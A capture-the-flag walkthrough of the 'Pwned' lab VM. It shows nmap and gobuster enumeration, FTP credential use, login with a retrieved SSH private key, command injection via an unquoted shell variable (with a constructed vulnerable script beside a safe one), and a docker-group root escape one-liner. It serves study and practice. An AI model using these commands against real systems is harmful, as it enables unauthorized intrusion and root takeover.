0x01 Information gathering

NMAP

```
$ nmap -T5 -p- -sV -sC 192.168.56.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 17:21 CST
Nmap scan report for 192.168.56.3
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
Attack surface analysis

Port 21 (ftp): the nmap default scripts (`-sC`) report no anonymous login, so there is no point trying that by hand.

Port 22 (ssh): with no credentials or key, the only option would be brute force, which is a last resort.

Port 80 (http): since 21 and 22 give nothing to work with, the leads almost certainly have to come from the web service.
HTTP

```
$ gobuster dir -u http://192.168.56.3/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.56.3/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/21 17:22:44 Starting gobuster
===============================================================
/nothing (Status: 301)
/server-status (Status: 403)
/hidden_text (Status: 301)
===============================================================
2020/07/21 17:23:29 Finished
===============================================================
```
/nothing really contains nothing; the author was not lying.

/hidden_text holds a file called secret.dic. Downloading it and looking inside, it is a list of paths, so it is most likely meant to be used as a directory wordlist. Feed it back to gobuster:
```
$ gobuster dir -u http://192.168.56.3/ -w ./secret.dic
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.56.3/
[+] Threads:        10
[+] Wordlist:       ./secret.dic
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/21 17:24:22 Starting gobuster
===============================================================
/pwned.vuln (Status: 301)
===============================================================
2020/07/21 17:24:22 Finished
===============================================================
```
Visiting /pwned.vuln:

So now we have an FTP username and password.
FTP

```
$ ftp 192.168.56.3
Connected to 192.168.56.3.
220 (vsFTPd 3.0.3)
Name (192.168.56.3:vkk): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
drwxr-xr-x    2 0        0            4096 Jul 10 12:47 share
ftp> cd share
250 Directory successfully changed.
ftp> ls
-rw-r--r--    1 0        0            2602 Jul 09 15:05 id_rsa
-rw-r--r--    1 0        0              75 Jul 09 17:41 note.txt
226 Directory send OK.
ftp> get id_rsa
ftp> get note.txt
ftp> quit
221 Goodbye.
```
Both downloaded files (a 2602-byte id_rsa, i.e. an SSH private key, and a short note) are likely to be needed in the following steps.
0x02 Exploitation

After downloading the SSH private key, set its permissions to 600 (or 400); ssh refuses to use a key that is readable by other users. The username the key belongs to is not known, but note.txt mentions an English first name, so try that name directly as the login.
```
chmod 600 id_rsa
cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(

ssh -i id_rsa ariana@192.168.56.3
```
Login succeeds.

Looking at file permissions, there is nothing that can be tampered with directly.

The thing to focus on here is the line that expands the variable msg and runs it with its error output redirected to /dev/null, i.e. `$msg 2>/dev/null`.

What this means is: the value of the variable msg is executed as a program (the first word of the value is the command, the remaining words are its arguments), and whatever that program writes to stderr is thrown away. Since msg is filled with what the user types, typing a command name instead of a message runs that command in the context of the script, and the redirect hides any error that would otherwise reveal what is going on.

I only noticed this after discussing it with people in the group. At first I stumbled into it by accident: I simply typed whoami and got output back, without realizing why (thanks to dis_ for the explanation).
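To make the behaviour of that line concrete, here is an added example that is not the script from the box (the box's script is not reproduced on this page): a constructed stand-in that takes a "message" into the variable msg and runs `$msg 2>/dev/null`, placed beside a version that only prints the message. The function names, the stdin variant and the sample inputs are assumptions made for this example.

```sh
#!/bin/sh
# Added example (not the box's own script): a constructed stand-in for a
# "messenger" script that stores user input in msg and then runs
# "$msg 2>/dev/null". Function names and inputs are assumptions.

# Vulnerable pattern: msg is expanded unquoted and the result is used as a
# command line. The first word of the message becomes the program to run,
# the rest become its arguments. The stderr redirect hides any error, so a
# non-command "message" just fails silently.
vulnerable_messenger() {
    msg="$1"
    $msg 2>/dev/null
}

# Same flaw, but filling msg from stdin the way an interactive script
# would ("read msg"): input is still executed, not displayed.
vulnerable_messenger_stdin() {
    read -r msg
    $msg 2>/dev/null
}

# Hardened pattern: treat the message as data only. A fixed printf format
# string never interprets the message as a command, whatever it contains.
safe_messenger() {
    msg="$1"
    printf '%s\n' "$msg"
}

# Stand-alone demo: sh this_file.sh demo
if [ "${1:-}" = "demo" ]; then
    echo "--- vulnerable: input 'id -un' runs id and prints who the script runs as ---"
    vulnerable_messenger 'id -un'
    echo "--- vulnerable: input 'no_such_cmd' fails silently because stderr is dropped ---"
    vulnerable_messenger 'no_such_cmd' || echo "(exit status $?, no error shown)"
    echo "--- safe: the same input is echoed, not executed ---"
    safe_messenger 'id -un'
fi
```

The `id -un` case is the whoami observation from above: the name printed is that of the account the script runs under, which is exactly what makes the construct interesting when the script is executed as a different user.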
0x03 Privilege escalation

The user obtained is a member of the docker group (visible in the output of `id`), so escalate through the docker group directly. Members of that group can talk to the Docker daemon, which runs as root, so they can start a container that bind-mounts the host's root filesystem and chroot into it, which gives a root shell on the host. This needs the alpine image to be present locally or pullable from the network.

```
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```